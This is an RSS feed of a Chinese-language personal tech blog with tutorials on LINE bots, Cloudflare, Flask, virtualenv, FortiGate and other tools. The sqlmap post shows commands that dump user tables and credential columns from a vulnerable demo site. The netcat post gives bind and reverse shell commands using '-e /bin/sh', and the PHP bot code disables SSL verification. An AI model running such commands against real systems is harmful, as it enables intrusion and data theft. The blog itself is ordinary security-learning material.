<![CDATA[小小工程師的日常筆記]]>

<![CDATA[小小工程師的日常筆記]]> https://xdeath.tw/index.php zh-tw https://xdeath.tw/read.php?85 <![CDATA[如何建立Line 聊天機器人]]> admin <tszheng@twnic.net.tw> Mon, 10 May 2021 03:45:30 +0000 https://xdeath.tw/read.php?85
這篇文章就是紀錄怎麼開發一個LINE聊天機器人，能夠主動發送訊息

取代以往用簡訊或EMAIL提醒的功能，畢竟大家會去看LINE的頻率應該

比打開手機/電腦看email的頻率要高吧。

[建立機器人]

首先從網頁上登入進入developers，登入你的line帳號後

建立一個channels，進入MessageAPI中，可以取得你的Channel access token

接著再Basic Setting中可以找到你的Channel secret，以及user id，先把這

幾個資訊記錄下來。

接著到MessageAPI中，有一個QR code，妳可以開啟你的LINE掃描，就可以將

這個line機器人加入成為朋友了；在這邊你也可以設定是否可以自動加入朋友

自動回覆訊息、加入好友歡迎訊息等設定，基本上一個沒有任何功能的機器人。

就完成了。

[傳送與回覆訊息]

line機器人傳送訊息只是透過簡單的WEB API，再header加上剛剛取得的access token

並將要傳送的對象，訊息內容用json格式包起來

以php為例

傳送給某一位朋友或是一個聊天室

function push($message)
{
    global $channelAccessToken;
    $payload = [
       'to' => "要傳送對象的userID",
       'messages' => [
           [
               'type' => 'text',
               'text' => $message
           ]
       ]
    ];
// Send Request by CURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://api.line.me/v2/bot/message/push');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
       'Content-Type: application/json',
       'Authorization: Bearer ' . $channelAccessToken
    ]);
    $result = curl_exec($ch);
    curl_close($ch);
}

在payload中放入要傳送的對象以及內容即可(如何取得userid或是group id後面會再提到)。

傳送給所有人的話方法一樣，URL改成https://api.line.me/v2/bot/message/multicast 即可

若機器人單純只是要主動傳送訊息到這邊即可。

[接收訊息以及webhook]

在MessageAPI中有一個webhook設定，webhook是類似一個中介的作用，可以攔截所有的原始訊息

可以透過webhook找到使用者/群組的ID，也可以依據使用者傳送的訊息進行回覆。

首先你必須要申請一個網站，以及https的憑證，設定完Webhook URL後點下verify，顯示成功後

接著到webhook的網頁上放上這兩行

$json_string = file_get_contents('php://input');

error_log($json_string);

接著到聊天室中隨便點傳一個訊息，在/var/log/httpd/ssl_error_log中就可以看到類似下面的內容

{
  "destination":"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
  "events":
  [
    {
      "type":"message",
      "message":
      {
        "type":"text",
        "id":"xxxxxxxxxxxxxxxxxxxx",
        "text":"123"
      },
      "timestamp":1620617008589,
      "source":
      {
        "type":"user",
        "userId":"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"  #從這邊可以取得你的ID，或是群組的ID
      },
      "replyToken":"token",      #如果要回覆訊息需要加上這個token
      "mode":"active"
    }
  ]
}

可以看到詳細的一些內容，要回覆訊息的話就是依據text的內容去呼叫reply得函式

以下的範例就是當收到有人說"測試"時，使用reply回覆"測試回覆"。

    $access_token ='access_token';
    $json_string = file_get_contents('php://input');
    $json_obj = json_decode($json_string);
    $event = $json_obj->{"events"}[0];
    $message = $event->{"message"}->{"text"};
    $reply_token = $event->{"replyToken"};
    if($message == "測試")
        reply("測試回覆",$reply_token);

    function reply($message,$reply_token)
    {
        global $access_token;
        $post_data = [
            "replyToken" => $reply_token,
              "messages" => [
                [
                  "type" => "text",
                  "text" => $message
                ]
          ]
        ];
        $ch = curl_init("https://api.line.me/v2/bot/message/reply");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'Content-Type: application/json',
            'Authorization: Bearer '.$access_token
        ));
        $result = curl_exec($ch);
        curl_close($ch);
    }

PS：Line機器人有付費的版本也有免費的版本，免費版有限制每個月可以"主動"發送訊息的數量，但是回覆訊息的

數量是沒有限制的。 ]]> https://xdeath.tw/read.php?81 <![CDATA[如何設定cloudflare的CDN與免費https服務]]> admin <tszheng@twnic.net.tw> Wed, 18 Mar 2020 06:40:33 +0000 https://xdeath.tw/read.php?81
所謂的CDN就是把你的網站內容利用BGP anycast的技術放到cloudflare在世界上多個資料中心內

達到分散流量並且加快網站的連線速度。

首先先到cloudflare的網站右上角的sign up註冊一個新帳號

註冊登入後，點選add a site，輸入你註冊的網域名稱(有些免費的無法使用)

接著選擇你的方案，基本上可以先用免費的進行試用，付費版還有更多進階的功能

等大約一分鐘，他會掃描你現在的域名底下有哪些DNS record的設定

第一個欄位是你的網站網址，接著是你現在網站的IP，最後一欄是是否啟用他的proxy

因為我們等等要用cloudflare的https，所以這邊會選擇把proxy啟用

接著我們需要將DNS交給cloudflare進行代管，他會給你兩個dns主機進行設定

接下來你就要到自己註冊DNS的地方設定，你要將DNS指定到cloudflare這兩個DNS主機上

當然設定前還是要先把你原本的DNS所有record手動紀錄一下，之後還是要在cloudflare的DNS

上將這些record重新設定上去。

接著他會問你https的設定，off是不啟用，Flexible就是我們現在要用的

同時把永遠使用https開起來

接著大約等10~15分鐘，cloudflare會進行一些測試，同時DNS也需要一點時間生效

你可以測試ping自己的網站，如果顯示的IP已經不是原本自己的主機IP

同時網頁也可以看到內容，就表示都完成生效了

這樣子使用者要拜訪到你的網站，就會先到cloudflare的proxy

這一段就會使用cloudflare所簽屬的https憑證

接著cloudflare的proxy再透過未加密的http去你的網站真實的IP上取得網站內容回應給使用者

這樣第一個好處就是當被攻擊的時候，cloudflare的proxy會在前面先承受攻擊

而不會直接攻擊到你的網頁伺服器

第二個好處是由於它的憑證是免費的，現在如果自己去簽屬免費的憑證可能三個月就要重新申請一次

如果使用cloudflare的CDN就不會有這種常常要重新申請的困擾。

另外cloudfalre還提供許多加值的服務，例如DNS代管、DNSSEC、防火牆、統計報表...

另外要記得進入DNS將原本設定的其他dns record重新設定上去

其他的非網站的record，如果沒有要經過proxy(例如mail server)記得最後面的proxy就要取消掉

有些需要付費，有些是免費的，大家可以依照自己的需求升級自己的功能

進入主控台後，右邊有一個Active Subscriptions，點選change可以升級你的帳號版本

]]> https://xdeath.tw/read.php?76 <![CDATA[python web api]]> admin <tszheng@twnic.net.tw> Mon, 11 Mar 2019 02:48:26 +0000 https://xdeath.tw/read.php?76
pip install flask

用flask模擬一個5000 PORT的web server

from flask import abort
from flask import Flask, jsonify, request
app = Flask(__name__)

@app.route('/', methods=['GET'])
def hello():
return 'hello world!'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000 ,debug=True) #host=0.0.0.0就是開放所有人連線,127.0.0.1就是只接受本機連線

接下來用瀏覽器去連http://ip:5000，就會看到hello world!

一個頁面大概像下面這樣，method有POST、GET、PUT、DELETE

我比較常用的就是POST跟GET為主

@app.route(路徑,methods=['GET','POST'])  #路徑,允許的方法
def function():
    要做的動作
    return '要回傳的值'

那POST要怎麼接收值呢，其實就是用request.form

假設我們要接收一個datetime的參數

@app.route('/post',methods['POST'])
def function():
datetime = request.form['datetime']
return '要回傳的值'

比較麻煩的是如果使用者丟上來的參數沒有datetime，程式就會出錯

所以如果這是必要欄位建議還是用try去接收

@app.route('/post',methods['POST'])
def function():
    try:
        datetime = request.form['datetime']
    except:
        return 'error'
    return '要回傳的值'

如果是GET

@app.route('/test/',methods=['GET'])
def get_task():
return request.args.get("task_id") #直接取得參數

用瀏覽器連http://ip:5000/test/?task_id=123，就會看到123

如果是希望在連線沒有這個URL的時候不要跳出DEBUG的錯誤訊息，而是404之類的話

就在前面加上

@app.errorhandler(404)
def not_found(error):
return '404'

要取得USER到底是用post、get、put、delete的話

request.method(注意取得的值是大寫的GET、POST...)

取得使用者的IP  request.remote_addr

另外如果要設定timeout之類的話，很像單純只靠flask內建的web是做不到的

要搭配其他的module或是將執行的動作寫到另一個程式內

用os.popen去呼叫，並且在該程式使用multithread去計算是否有逾時

如果逾時則回覆504之類的... ]]> https://xdeath.tw/read.php?74 <![CDATA[DNS Flag Day ]]> admin <tszheng@twnic.net.tw> Wed, 30 Jan 2019 03:08:06 +0000 https://xdeath.tw/read.php?74
官方網頁在這邊：https://dnsflagday.net/

重點應該其實在於您的 DNS 權威伺服器有沒有支援 EDNS 的協議，如果沒有，
那在 2019/2/1 號以後，使用 8.8.8.8 或是 1.1.1.1 等大型公用 DNS 將會無法解析。

DNS flag day 是什麼？
DNS 內有一個延伸安全協定叫做 EDNS，主要提供 DNS 的安全性功能，譬如 DNSSEC
與擴展 DNS 封包。這些功能能夠幫助 DNS 的查詢更加安全。因為 DNS 本身的設計問
題，當初並考慮太多安全的設計。所以造成一些 DNS 詐騙或是污染。

但因為啟用 EDNS 之後，會造成封包變大，主機負載會變重，再過去硬體昂貴的年代
，影響很大，所以很多 DNS 軟體會繞過 EDNS 協議，在速度與安全之間妥協。而公用
DNS 就是其中一個我們常用的服務，公用 DNS 大部分來說會繞過(Workaround) EDN
S 來減低負載並提高速度。

但 Google、CloudFlare、IBM 等擁有公用 DNS 的大型廠商將於 2019/2/1 號之後開始將
8.8.8.8、1.1.1.1 與 9.9.9.9 停止繞過 EDNS，並且強制使用 EDNS 協議。

對你的影響是什麼？
其實重點應該是在權威伺服器，也就是大家知道的 DNS 代管服務商，他們使用的 DNS
主機有沒有將 DNS 軟體更新到新的版本。更新到新版軟體之後，自然對 EDNS 協議的
支援度就沒有問題。

如果他們還是使用舊版本的軟體，則公用 DNS 在對主機做查詢的時候，就會自動失效。
或是他們公司的防火牆 (任何主機之前的資安設備) 若是沒有支援 EDNS，同樣會失效，
通常防火牆設備會是比較大的問題。

我怎麼知道沒有支援 EDNS
你只要打開 https://dnsflagday.net/ 然後在中間的地方，下面的方框中，填入你的網域
名稱，就可知道你的 DNS 代管(權威伺服器)，有沒有支援 EDNS。

轉自哈維的部落格：https://blog.rsync.tw/dns-flag-day/
感恩哈維，讚嘆哈維~ ]]> https://xdeath.tw/read.php?73 <![CDATA[[python] virtualenv虛擬環境]]> admin <tszheng@twnic.net.tw> Wed, 17 Oct 2018 13:24:55 +0000 https://xdeath.tw/read.php?73
這樣如果要更換作業系統或是環境的時候比較容易整包帶走

在寫一些文件，需要知道安裝了那些套件時也比較容易釐清

首先需要安裝virtualenv，如果安裝的是開發環境之類的應該預設就有了

建立專案資料夾 virtualenv pytest，這樣就會建立一個pytest的資料夾

裡面有bin  include  lib  local等資料夾，pip安裝的module也會另外放在裡面...

如果你要用不同版本的python(python 2跟3差蠻多的)，可以指定用哪一個版本的python

virtualenv -p /usr/bin/python2.7 pytest

等出現Installing setuptools, pip, wheel...done就表示安裝完成了

接著進入虛擬環境

source pytest/bin/activate

最前面就會多一個pytest的標記

(pytest) root@py#

要退出就deactivate

另外要打包安裝的套件清單的話

pip freeze > requirements.txt

這樣要移到其他系統就可以根據requirements.txt進行一次安裝

pip install -r requirements.txt

當開發完畢或是整個專案要進行打包時，只要將整個pytest資料夾帶走

再安裝套件列表或是整個資料夾刪除就可以了

另外，如果是用python3所建立的虛擬環境，這樣整包帶走就會有問題

這時候你只能在新的機器上先建立一個新的python3環境

virtualenv -p /usr/bin/python3 pytest

source pytest/bin/activate

將你開發的程式以及requirements.txt複製進來後

pip install -r requirements.txt

這樣就能夠執行了 ]]> https://xdeath.tw/read.php?69 <![CDATA[sqlmap簡介]]> admin <tszheng@twnic.net.tw> Wed, 02 Aug 2017 02:35:34 +0000 https://xdeath.tw/read.php?69
這是一個專門測試是否具有sql injection漏洞的強大工具，建議對一些demo網站練習就好

如果要對別人網站使用之前，可能要考慮一下法律方面的問題

======================================================

Demo網站

一. http://demo.testfire.net/
二. http://testasp.vulnweb.com/
三. http://testphp.vulnweb.com/
四. http://testasp.vulnweb.com/
五. http://testhtml5.vulnweb.com/
六. http://google-gruyere.appspot.com/start

======================================================

首先sqlmap是一個用python開發的工具，所以要先安裝python接著再到git上下載最新版的sqlmap...

安裝的部分網頁上有很多可以參考

接著我們要入侵的第一步，找到網頁的注入點，也就是必須要有地方讓你輸入資料

所以我們必須先收集這些可以輸入資料的地方，當作注入點(可以使用google hacker之類的技術)

以http://testphp.vulnweb.com/  為例，選擇登入的頁面，就有讓你輸入帳號與密碼的欄位

當看到這些欄位時，如果你熟悉sql injection發生的原因，就可以在輸入一些對資料庫來說

一些特殊意義的字元做測試(單引號 ' ，註解//  #  /*  */)之類的，如果對方程式沒寫好

很可能就會直接跳出一些錯誤訊息給你，我們就可以直接判斷這個網頁存在sql injection的弱點

當找到相關的欄位後，可以使用firefox的plugin - live http headers之類的工具，開始抓取我們送出去的資料

例如我們帳號admin密碼也使用admin送出後，可以從抓到的資料裡面抓到這行

uname=admin&pass=admin: undefined

這就是我們送出去的資料，這時候我們就可以開始用sqlmap簡單的進行測試

./sqlmap.py -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" --threads=4 --level=3 --risk=3 --table

-u 是要做測試的url

--data 是我們送出的欄位資料

--threads 表示要用幾條線程做測試，越高速度越快，但是有一些防禦設備你攻擊的速度太快會直接被列入黑名單

--level  --risk是深度以及強度，建議使用3以上，越高拆解的速度越慢

--table 表示如果注入成功的話我要取出所有table name

如果注入成功的話，它會自動儲存這個網站注入成功的相關LOG，順利的話我們就可以取出他所使用資料庫帳號所有權限

的所有talbe以及相關欄位，接著更深入一點可以看一下欄位資料

./sqlmap.py -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" -D dbname -T users --columns

-D 指定哪一個資料庫

-T 指定哪一張tables

--columns 我要取得欄位資料

最後可以嘗試dump所有資料或是dump特定欄位資料

./sqlmap.py -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" -D dbname -T users --dump #所有欄位

./sqlmap.py -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" -D dbname -T users --dump -C "username,passwd"

======================================================

那有些欄位可能是需要我們再登入後才可以進入的頁面，這時候我們就要加上一個參數

--cookie=COOKIE     HTTP Cookie header value

我們手動登入之後一樣使用live http headers取得我們的cookie資料加在這個參數中即可

sqlmap還有其他更多詳細的參數可以用sqlmap --help參考

======================================================

我常常碰到一些人在寫網頁的時候，資料庫是預設使用root進行登入，如果在一個多人開發的主機上

這是一個蠻危險的方式，即使你有做好程式的安全性控管，但是你的同仁或其他開發者，不論是被

sql injection或是程式碼被取走，只要有一個洞被入侵，因為root這個帳號有所有資料庫的權限，基本

上一次就會全部失守，建議還是勤勞一點，每一個專案都用grant建立相關的帳號以及做好權限的控管。 ]]> https://xdeath.tw/read.php?56 <![CDATA[fortigate開啟sslvpn功能]]> admin <tszheng@twnic.net.tw> Fri, 09 Sep 2016 06:37:22 +0000 https://xdeath.tw/read.php?56
fortigate防火牆的wan public ip假設是1.164.135.24

現在的情境是在外部需要連線進入取得192.168.1.x的內部IP

可以訪問內網的設備，同時可以將1.164.135.24當作跳板，連線到其他ineternet

首先先啟用VPN的功能，在儀表板上有一個VPN把他調整到ON

接下來操作模式必須是NAT，如果使用透通的話就無法使用VPN了

接著把public IP綁到wan1上

系統管理->網路->介面->wan1

位址你可以選擇DHCP也可以自訂，看每個人網路環境

接下來先建立sslvpn的帳號以及群組

用戶與設備->用戶認證->建立一個新使用者

用戶與設備->用戶群組->建立一個sslvpn的群組

，同時把剛剛的使用者放進來

政策&物件->物件->位址新增一段位址(vpnip)給VPN的使用者(192.168.1.200-192.168.1.210)

政策&物件->物件->位址新增一段位址(local_lan)給內網(192.168.1.0/24)

接下來設定VPN的部分

VPN->SSL->門戶網站->full-access 將啟用切分隧道不要勾選

來源IP pools選擇vpnip

VPN->SSL->設定->full-access 將啟用切分隧道不要勾選

介面監聽可以選擇any，不過一般都是從外面播號進來，所以我選擇WAN1，port改為10443

IP範圍使用vpnip，認證/入口網對應新增sslvpn群組只用full-access，其他使用群組也使用full-access(共兩筆)

這樣VPN應該就啟用了，接著設定policy

如果要允許VPN使用者能夠訪問內網

ssl.root -> local_lan就需要啟用(記得NAT不要勾選，要不然全部VPN使用者都會帶一樣的IP)

如果要讓VPN把fortigate當作跳板，例如你人剛好在大陸想上個FB之類的

ssl.root -> wan1 就需要啟用

最後全部設定完成之後，請記得進入命令視窗輸入

config vpn ssl web protal

edit full-access

set host-check av

end

網路上找到的文件很像都沒這段，最後全部設定完成之後

https://1.164.135.24:10443應該可以看到登入畫面(但是無法用瀏覽器登入)

你就可以安裝forti client使用sslvpn了

]]> https://xdeath.tw/read.php?54 <![CDATA[網路測試的瑞士刀--netcat]]> admin <tszheng@twnic.net.tw> Wed, 27 Jul 2016 05:58:22 +0000 https://xdeath.tw/read.php?54
這兩天參加教育訓練剛好看到影片中有使用nc這個指令(全名是netcat)

後來就去查了一下，挖靠不得了，這工具真是包山包海

可以開socket server，也可以直接對遠端做連線

可以掃port，甚至可以拿來操控對方電腦、傳檔案

真是方便到一個不行

對遠端做連線

nc x.x.x.x port

開啟socket server等待連線

nc -l port

傳送檔案

[接收端]

nc -l 9999 > 寫入的檔案名稱

[傳送端]

nc x.x.x.x 9999 < 要傳送的檔案名稱

port掃描

nc -vv -z -w1 x.x.x.x port1~port2 #w1是指一秒

不過掃描port的功能比起nmap其實還差蠻遠的

遙控電腦

[被遙控端]

如果被遙控端的電腦是linux，執行命令是/bin/sh

如果是windows，則是cmd.exe

nc -v -l -p port -e /bin/sh

當然一般正常會希望這個process一直存在著，所以可以加上-k

這樣就不會斷線之後這個process就結束了

[控制端]

nc x.x.x.x port

遙控電腦(反向控制)

所謂反向控制遙控是指連線由被控制端主動發起

避免port被防火牆擋住(A要控制B，B去向A請求、建立連線後，A遙控B做動作)

[控制端]

nc -l -vv -p port

[被遙控端]

nc -e /bin/sh x.x.x.x port

另外她還有一些，偽造source ip 的功能我就沒有特別研究了
]]> https://xdeath.tw/read.php?31 <![CDATA[fortigate ipv6 log設定]]> admin <tszheng@twnic.net.tw> Mon, 28 Dec 2015 07:22:27 +0000 https://xdeath.tw/read.php?31
設定方式如下

config system interface
edit port16
config ipv6
set ip6-address 2001:db8::1/32
set ip6-send-adv enable
config ip6-prefix-list
edit 2001:db8::/32
set autonomous-flag enable
set onlink-flag enable
next
end
end
end

同時在設定policy的時候需要關閉NAT的功能

接下來是要開啟log，將log倒到自建的 log server上

config log syslogd setting
set status enable
set server IP
set port 514
set facility user
end ]]> https://xdeath.tw/read.php?23 <![CDATA[notepad++進階用法]]> admin <tszheng@twnic.net.tw> Tue, 10 Feb 2015 03:10:05 +0000 https://xdeath.tw/read.php?23
例如正規表示法的取代，使用正規表示法全部取代就比寫一個簡單的程式會快很多

1.notepad++上的正規表示法

首先ctrl + f搜尋，搜尋模式勾?用類型表示?，接著在搜尋的地方就可以使用正規表示法

例如
TEST
，要取中間文字搜尋目標可以使用
(.*)<\/br>，$1 = TEST

這樣在paser網頁的資料相當的方便

2.貪婪模式與非貪婪模式

在使用正規表示法找資料的時候常常會碰到使用萬用字元.*去抓到過長的資料，這點在網頁上特別容易碰到

舉例來說
TEST

TEST1

TEST2

我如果使用
(.*)<\/br>(預設貪婪模式)去抓tag中間的文字，就會把中間全部都選到TEST

TEST1

TEST2

但是實際上我要的只是TEST、TEST1、TEST2，這時候就要加上?、
(.*?)<\/br>告訴他我要抓最短符合條件的字串。

3.其他特殊功能

用類型表示的情況下也可以直接搜尋\n、\r這些特殊字元

另外在linux底下可以針對某個目錄底下所有文件找關鍵字的功能相當好用 grep -r -i "關鍵字" 目錄

實際上notepadd++一樣可以針對某目錄底下所有文件去搜尋關鍵字

只要在搜尋上面的拉霸點擊搜尋目錄即可，這點在在修改某些沒

正規化的程式碼特別好用(例如要大量改IP，重新命名變數名稱...) ]]>